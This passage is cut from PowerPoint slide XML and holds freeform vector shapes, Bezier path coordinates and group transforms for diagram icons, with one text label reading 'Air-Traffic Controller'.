                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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59"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1956" y="2320"/>
                  <a:ext cx="299" cy="704"/>
                  <a:chOff x="2281" y="1239"/>
                  <a:chExt cx="105" cy="247"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="268" name="Group 6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281" y="1239"/>
                    <a:ext cx="105" cy="138"/>
                    <a:chOff x="-12596" y="16975"/>
                    <a:chExt cx="319" cy="416"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="272" name="Freeform 61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-12596" y="16975"/>
                      <a:ext cx="319" cy="416"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 319"/>
                        <a:gd name="T1" fmla="*/ 416 h 416"/>
                        <a:gd name="T2" fmla="*/ 0 w 319"/>
                        <a:gd name="T3" fmla="*/ 85 h 416"/>
                        <a:gd name="T4" fmla="*/ 319 w 319"/>
                        <a:gd name="T5" fmla="*/ 0 h 416"/>
                        <a:gd name="T6" fmla="*/ 319 w 319"/>
                        <a:gd name="T7" fmla="*/ 328 h 416"/>
                        <a:gd name="T8" fmla="*/ 0 w 319"/>
                        <a:gd name="T9" fmla="*/ 416 h 41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19" h="416">
                          <a:moveTo>
                            <a:pt x="0" y="416"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="85"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="319" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="319" y="328"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="416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1B171B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3" name="Freeform 6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-12525" y="17086"/>
                      <a:ext cx="175" cy="194"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 34 w 74"/>
                        <a:gd name="T1" fmla="*/ 52 h 82"/>
                        <a:gd name="T2" fmla="*/ 33 w 74"/>
                        <a:gd name="T3" fmla="*/ 55 h 82"/>
                        <a:gd name="T4" fmla="*/ 11 w 74"/>
                        <a:gd name="T5" fmla="*/ 81 h 82"/>
                        <a:gd name="T6" fmla="*/ 0 w 74"/>
                        <a:gd name="T7" fmla="*/ 73 h 82"/>
                        <a:gd name="T8" fmla="*/ 3 w 74"/>
                        <a:gd name="T9" fmla="*/ 73 h 82"/>
                        <a:gd name="T10" fmla="*/ 25 w 74"/>
                        <a:gd name="T11" fmla="*/ 50 h 82"/>
                        <a:gd name="T12" fmla="*/ 27 w 74"/>
                        <a:gd name="T13" fmla="*/ 45 h 82"/>
                        <a:gd name="T14" fmla="*/ 25 w 74"/>
                        <a:gd name="T15" fmla="*/ 42 h 82"/>
                        <a:gd name="T16" fmla="*/ 11 w 74"/>
                        <a:gd name="T17" fmla="*/ 19 h 82"/>
                        <a:gd name="T18" fmla="*/ 19 w 74"/>
                        <a:gd name="T19" fmla="*/ 3 h 82"/>
                        <a:gd name="T20" fmla="*/ 33 w 74"/>
                        <a:gd name="T21" fmla="*/ 31 h 82"/>
                        <a:gd name="T22" fmla="*/ 34 w 74"/>
                        <a:gd name="T23" fmla="*/ 33 h 82"/>
                        <a:gd name="T24" fmla="*/ 37 w 74"/>
                        <a:gd name="T25" fmla="*/ 28 h 82"/>
                        <a:gd name="T26" fmla="*/ 61 w 74"/>
                        <a:gd name="T27" fmla="*/ 1 h 82"/>
                        <a:gd name="T28" fmla="*/ 68 w 74"/>
                        <a:gd name="T29" fmla="*/ 4 h 82"/>
                        <a:gd name="T30" fmla="*/ 70 w 74"/>
                        <a:gd name="T31" fmla="*/ 6 h 82"/>
                        <a:gd name="T32" fmla="*/ 45 w 74"/>
                        <a:gd name="T33" fmla="*/ 35 h 82"/>
                        <a:gd name="T34" fmla="*/ 42 w 74"/>
                        <a:gd name="T35" fmla="*/ 40 h 82"/>
                        <a:gd name="T36" fmla="*/ 44 w 74"/>
                        <a:gd name="T37" fmla="*/ 42 h 82"/>
                        <a:gd name="T38" fmla="*/ 68 w 74"/>
                        <a:gd name="T39" fmla="*/ 52 h 82"/>
                        <a:gd name="T40" fmla="*/ 74 w 74"/>
                        <a:gd name="T41" fmla="*/ 49 h 82"/>
                        <a:gd name="T42" fmla="*/ 68 w 74"/>
                        <a:gd name="T43" fmla="*/ 62 h 82"/>
                        <a:gd name="T44" fmla="*/ 61 w 74"/>
                        <a:gd name="T45" fmla="*/ 67 h 82"/>
                        <a:gd name="T46" fmla="*/ 38 w 74"/>
                        <a:gd name="T47" fmla="*/ 55 h 82"/>
                        <a:gd name="T48" fmla="*/ 34 w 74"/>
                        <a:gd name="T49" fmla="*/ 52 h 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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="74" h="82">
                          <a:moveTo>
                            <a:pt x="34" y="52"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="33" y="55"/>
                            <a:pt x="33" y="55"/>
                            <a:pt x="33" y="55"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="23" y="71"/>
                            <a:pt x="16" y="80"/>
                            <a:pt x="11" y="81"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="7" y="82"/>
                            <a:pt x="4" y="79"/>
                            <a:pt x="0" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="73"/>
                            <a:pt x="2" y="73"/>
                            <a:pt x="3" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="71"/>
                            <a:pt x="16" y="64"/>
                            <a:pt x="25" y="50"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="45"/>
                            <a:pt x="27" y="45"/>
                            <a:pt x="27" y="45"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="25" y="42"/>
                            <a:pt x="25" y="42"/>
                            <a:pt x="25" y="42"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="16" y="32"/>
                            <a:pt x="11" y="24"/>
                            <a:pt x="11" y="19"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="11" y="15"/>
                            <a:pt x="13" y="10"/>
                            <a:pt x="19" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="21" y="14"/>
                            <a:pt x="26" y="23"/>
                            <a:pt x="33" y="31"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="34" y="33"/>
                            <a:pt x="34" y="33"/>
                            <a:pt x="34" y="33"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="28"/>
                            <a:pt x="37" y="28"/>
                            <a:pt x="37" y="28"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="47" y="11"/>
                            <a:pt x="55" y="2"/>
                            <a:pt x="61" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="64" y="0"/>
                            <a:pt x="66" y="1"/>
                            <a:pt x="68" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="69" y="4"/>
                            <a:pt x="69" y="5"/>
                            <a:pt x="70" y="6"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="62" y="12"/>
                            <a:pt x="54" y="21"/>
                            <a:pt x="45" y="35"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="42" y="40"/>
                            <a:pt x="42" y="40"/>
                            <a:pt x="42" y="40"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="42"/>
                            <a:pt x="44" y="42"/>
                            <a:pt x="44" y="42"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="53" y="51"/>
                            <a:pt x="61" y="54"/>
                            <a:pt x="68" y="52"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="70" y="52"/>
                            <a:pt x="72" y="50"/>
                            <a:pt x="74" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="72" y="56"/>
                            <a:pt x="70" y="60"/>
                            <a:pt x="68" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="66" y="65"/>
                            <a:pt x="64" y="66"/>
                            <a:pt x="61" y="67"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="55" y="68"/>
                            <a:pt x="48" y="64"/>
                            <a:pt x="38" y="55"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="34" y="52"/>
                            <a:pt x="34" y="52"/>
                            <a:pt x="34" y="52"/>
                          </a:cubicBezTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:cu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6350" cmpd="sng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69" name="Group 63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281" y="1349"/>
                    <a:ext cx="105" cy="137"/>
                    <a:chOff x="-12596" y="18220"/>
                    <a:chExt cx="319" cy="416"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="270" name="Freeform 6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-12596" y="18220"/>
                      <a:ext cx="319" cy="416"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 319"/>
                        <a:gd name="T1" fmla="*/ 416 h 416"/>
                        <a:gd name="T2" fmla="*/ 0 w 319"/>
                        <a:gd name="T3" fmla="*/ 85 h 416"/>
                        <a:gd name="T4" fmla="*/ 319 w 319"/>
                        <a:gd name="T5" fmla="*/ 0 h 416"/>
                        <a:gd name="T6" fmla="*/ 319 w 319"/>
                        <a:gd name="T7" fmla="*/ 331 h 416"/>
                        <a:gd name="T8" fmla="*/ 0 w 319"/>
                        <a:gd name="T9" fmla="*/ 416 h 41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19" h="416">
                          <a:moveTo>
                            <a:pt x="0" y="416"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="85"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="319" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="319" y="331"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="416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1B171B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1" name="Freeform 65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-12565" y="18303"/>
                      <a:ext cx="257" cy="250"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 103 w 109"/>
                        <a:gd name="T1" fmla="*/ 19 h 106"/>
                        <a:gd name="T2" fmla="*/ 95 w 109"/>
                        <a:gd name="T3" fmla="*/ 18 h 106"/>
                        <a:gd name="T4" fmla="*/ 95 w 109"/>
                        <a:gd name="T5" fmla="*/ 8 h 106"/>
                        <a:gd name="T6" fmla="*/ 100 w 109"/>
                        <a:gd name="T7" fmla="*/ 1 h 106"/>
                        <a:gd name="T8" fmla="*/ 91 w 109"/>
                        <a:gd name="T9" fmla="*/ 4 h 106"/>
                        <a:gd name="T10" fmla="*/ 85 w 109"/>
                        <a:gd name="T11" fmla="*/ 17 h 106"/>
                        <a:gd name="T12" fmla="*/ 79 w 109"/>
                        <a:gd name="T13" fmla="*/ 26 h 106"/>
                        <a:gd name="T14" fmla="*/ 76 w 109"/>
                        <a:gd name="T15" fmla="*/ 28 h 106"/>
                        <a:gd name="T16" fmla="*/ 24 w 109"/>
                        <a:gd name="T17" fmla="*/ 71 h 106"/>
                        <a:gd name="T18" fmla="*/ 14 w 109"/>
                        <a:gd name="T19" fmla="*/ 72 h 106"/>
                        <a:gd name="T20" fmla="*/ 5 w 109"/>
                        <a:gd name="T21" fmla="*/ 77 h 106"/>
                        <a:gd name="T22" fmla="*/ 0 w 109"/>
                        <a:gd name="T23" fmla="*/ 94 h 106"/>
                        <a:gd name="T24" fmla="*/ 7 w 109"/>
                        <a:gd name="T25" fmla="*/ 85 h 106"/>
                        <a:gd name="T26" fmla="*/ 16 w 109"/>
                        <a:gd name="T27" fmla="*/ 86 h 106"/>
                        <a:gd name="T28" fmla="*/ 15 w 109"/>
                        <a:gd name="T29" fmla="*/ 97 h 106"/>
                        <a:gd name="T30" fmla="*/ 10 w 109"/>
                        <a:gd name="T31" fmla="*/ 105 h 106"/>
                        <a:gd name="T32" fmla="*/ 20 w 109"/>
                        <a:gd name="T33" fmla="*/ 102 h 106"/>
                        <a:gd name="T34" fmla="*/ 27 w 109"/>
                        <a:gd name="T35" fmla="*/ 87 h 106"/>
                        <a:gd name="T36" fmla="*/ 33 w 109"/>
                        <a:gd name="T37" fmla="*/ 77 h 106"/>
                        <a:gd name="T38" fmla="*/ 87 w 109"/>
                        <a:gd name="T39" fmla="*/ 31 h 106"/>
                        <a:gd name="T40" fmla="*/ 96 w 109"/>
                        <a:gd name="T41" fmla="*/ 30 h 106"/>
                        <a:gd name="T42" fmla="*/ 104 w 109"/>
                        <a:gd name="T43" fmla="*/ 26 h 106"/>
                        <a:gd name="T44" fmla="*/ 109 w 109"/>
                        <a:gd name="T45" fmla="*/ 11 h 106"/>
                        <a:gd name="T46" fmla="*/ 103 w 109"/>
                        <a:gd name="T47" fmla="*/ 19 h 10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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="109" h="106">
                          <a:moveTo>
                            <a:pt x="103" y="19"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="102" y="20"/>
                            <a:pt x="98" y="23"/>
                            <a:pt x="95" y="18"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="92" y="12"/>
                            <a:pt x="95" y="9"/>
                            <a:pt x="95" y="8"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="96" y="7"/>
                            <a:pt x="100" y="2"/>
                            <a:pt x="100" y="1"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="101" y="1"/>
                            <a:pt x="97" y="0"/>
                            <a:pt x="91" y="4"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="86" y="8"/>
                            <a:pt x="85" y="13"/>
                            <a:pt x="85" y="17"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="84" y="22"/>
                            <a:pt x="80" y="25"/>
                            <a:pt x="79" y="26"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="79" y="26"/>
                            <a:pt x="78" y="27"/>
                            <a:pt x="76" y="28"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="24" y="71"/>
                            <a:pt x="24" y="71"/>
                            <a:pt x="24" y="71"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="24" y="71"/>
                            <a:pt x="21" y="74"/>
                            <a:pt x="14" y="72"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="14" y="72"/>
                            <a:pt x="9" y="71"/>
                            <a:pt x="5" y="77"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="83"/>
                            <a:pt x="0" y="91"/>
                            <a:pt x="0" y="94"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="97"/>
                            <a:pt x="5" y="88"/>
                            <a:pt x="7" y="85"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="8" y="83"/>
                            <a:pt x="12" y="80"/>
                            <a:pt x="16" y="86"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="19" y="92"/>
                            <a:pt x="16" y="96"/>
                            <a:pt x="15" y="97"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="14" y="98"/>
                            <a:pt x="10" y="104"/>
                            <a:pt x="10" y="105"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="105"/>
                            <a:pt x="13" y="106"/>
                            <a:pt x="20" y="102"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="26" y="97"/>
                            <a:pt x="26" y="92"/>
                            <a:pt x="27" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="28" y="82"/>
                            <a:pt x="32" y="78"/>
                            <a:pt x="33" y="77"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="34" y="77"/>
                            <a:pt x="87" y="31"/>
                            <a:pt x="87" y="31"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="87" y="31"/>
                            <a:pt x="90" y="29"/>
                            <a:pt x="96" y="30"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="96" y="30"/>
                            <a:pt x="101" y="32"/>
                            <a:pt x="104" y="26"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="108" y="21"/>
                            <a:pt x="109" y="13"/>
                            <a:pt x="109" y="11"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="109" y="8"/>
                            <a:pt x="104" y="17"/>
                            <a:pt x="103" y="19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6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="1B161B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sp>
          <p:nvSpPr>
            <p:cNvPr id="324" name="Freeform 2783"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3880878" y="2802940"/>
              <a:ext cx="2063751" cy="555625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5" name="Rectangle 324"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5775565" y="3872388"/>
              <a:ext cx="1514197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Air-Traffic Controller </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="326" name="Group 2808"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4147578" y="1752015"/>
              <a:ext cx="263525" cy="396875"/>
              <a:chOff x="1985" y="816"/>
              <a:chExt cx="1789" cy="2690"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="327" name="Line 2809"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2999" y="3473"/>
                <a:ext cx="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28" name="Freeform 2810"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2881" y="957"/>
                <a:ext cx="893" cy="2549"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 893"/>
                  <a:gd name="T1" fmla="*/ 0 h 2549"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 2549 h 2549"/>
                  <a:gd name="T4" fmla="*/ 893 w 893"/>
                  <a:gd name="T5" fmla="*/ 2308 h 2549"/>
                  <a:gd name="T6" fmla="*/ 0 w 893"/>
                  <a:gd name="T7" fmla="*/ 0 h 254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93"/>
                  <a:gd name="T13" fmla="*/ 0 h 2549"/>
                  <a:gd name="T14" fmla="*/ 893 w 893"/>
                  <a:gd name="T15" fmla="*/ 2549 h 254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93" h="2549">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="230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29" name="Freeform 2811"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1985" y="957"/>
                <a:ext cx="896" cy="2549"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 896"/>
                  <a:gd name="T1" fmla="*/ 2308 h 2549"/>
                  <a:gd name="T2" fmla="*/ 896 w 896"/>
                  <a:gd name="T3" fmla="*/ 2549 h 2549"/>
                  <a:gd name="T4" fmla="*/ 896 w 896"/>
                  <a:gd name="T5" fmla="*/ 0 h 2549"/>
                  <a:gd name="T6" fmla="*/ 0 w 896"/>
                  <a:gd name="T7" fmla="*/ 2308 h 254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96"/>
                  <a:gd name="T13" fmla="*/ 0 h 2549"/>
                  <a:gd name="T14" fmla="*/ 896 w 896"/>
                  <a:gd name="T15" fmla="*/ 2549 h 254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96" h="2549">
                    <a:moveTo>
                      <a:pt x="0" y="2308"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="896" y="2549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2308"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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30" name="Freeform 2812"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2881" y="1593"/>
                <a:ext cx="893" cy="1672"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 893 w 893"/>
                  <a:gd name="T1" fmla="*/ 1672 h 1672"/>
                  <a:gd name="T2" fmla="*/ 0 w 893"/>
                  <a:gd name="T3" fmla="*/ 1431 h 1672"/>
                  <a:gd name="T4" fmla="*/ 569 w 893"/>
                  <a:gd name="T5" fmla="*/ 836 h 1672"/>
                  <a:gd name="T6" fmla="*/ 2 w 893"/>
                  <a:gd name="T7" fmla="*/ 522 h 1672"/>
                  <a:gd name="T8" fmla="*/ 245 w 893"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 1672"/>
                  <a:gd name="T17" fmla="*/ 893 w 893"/>
                  <a:gd name="T18" fmla="*/ 1672 h 16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3" h="1672">
                    <a:moveTo>
                      <a:pt x="893" y="1672"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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31" name="Freeform 2813"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1985" y="1593"/>
                <a:ext cx="898" cy="1672"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 898"/>
                  <a:gd name="T1" fmla="*/ 1672 h 1672"/>
                  <a:gd name="T2" fmla="*/ 896 w 898"/>
                  <a:gd name="T3" fmla="*/ 1431 h 1672"/>
                  <a:gd name="T4" fmla="*/ 324 w 898"/>
                  <a:gd name="T5" fmla="*/ 836 h 1672"/>
                  <a:gd name="T6" fmla="*/ 898 w 898"/>
                  <a:gd name="T7" fmla="*/ 522 h 1672"/>
                  <a:gd name="T8" fmla="*/ 648 w 898"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 1672"/>
                  <a:gd name="T17" fmla="*/ 898 w 898"/>
                  <a:gd name="T18" fmla="*/ 1672 h 16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8" h="1672">
                    <a:moveTo>
                      <a:pt x="0" y="1672"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="896" y="1431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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32" name="Freeform 2814"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2148" y="1645"/>
                <a:ext cx="737" cy="1861"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 737 w 737"/>
                  <a:gd name="T1" fmla="*/ 0 h 1861"/>
                  <a:gd name="T2" fmla="*/ 324 w 737"/>
                  <a:gd name="T3" fmla="*/ 366 h 1861"/>
                  <a:gd name="T4" fmla="*/ 733 w 737"/>
                  <a:gd name="T5" fmla="*/ 919 h 1861"/>
                  <a:gd name="T6" fmla="*/ 0 w 737"/>
                  <a:gd name="T7" fmla="*/ 1202 h 1861"/>
                  <a:gd name="T8" fmla="*/ 733 w 737"/>
                  <a:gd name="T9" fmla="*/ 1861 h 18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7"/>
                  <a:gd name="T16" fmla="*/ 0 h 1861"/>
                  <a:gd name="T17" fmla="*/ 737 w 737"/>
                  <a:gd name="T18" fmla="*/ 1861 h 18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7" h="1861">
                    <a:moveTo>
                      <a:pt x="737" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="324" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="1861"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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33" name="Freeform 2815"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2881" y="1654"/>
                <a:ext cx="722" cy="1852"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 722"/>
                  <a:gd name="T1" fmla="*/ 0 h 1852"/>
                  <a:gd name="T2" fmla="*/ 406 w 722"/>
                  <a:gd name="T3" fmla="*/ 357 h 1852"/>
                  <a:gd name="T4" fmla="*/ 0 w 722"/>
                  <a:gd name="T5" fmla="*/ 910 h 1852"/>
                  <a:gd name="T6" fmla="*/ 722 w 722"/>
                  <a:gd name="T7" fmla="*/ 1174 h 1852"/>
                  <a:gd name="T8" fmla="*/ 0 w 722"/>
                  <a:gd name="T9" fmla="*/ 1852 h 18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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1852"/>
                  <a:gd name="T17" fmla="*/ 722 w 722"/>
                  <a:gd name="T18" fmla="*/ 1852 h 18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2" h="1852">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="406" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1852"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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34" name="Freeform 2816"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2148" y="2828"/>
                <a:ext cx="1455" cy="196"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1455"/>
                  <a:gd name="T1" fmla="*/ 19 h 196"/>
                  <a:gd name="T2" fmla="*/ 733 w 1455"/>
                  <a:gd name="T3" fmla="*/ 196 h 196"/>
                  <a:gd name="T4" fmla="*/ 1455 w 1455"/>
                  <a:gd name="T5" fmla="*/ 0 h 196"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
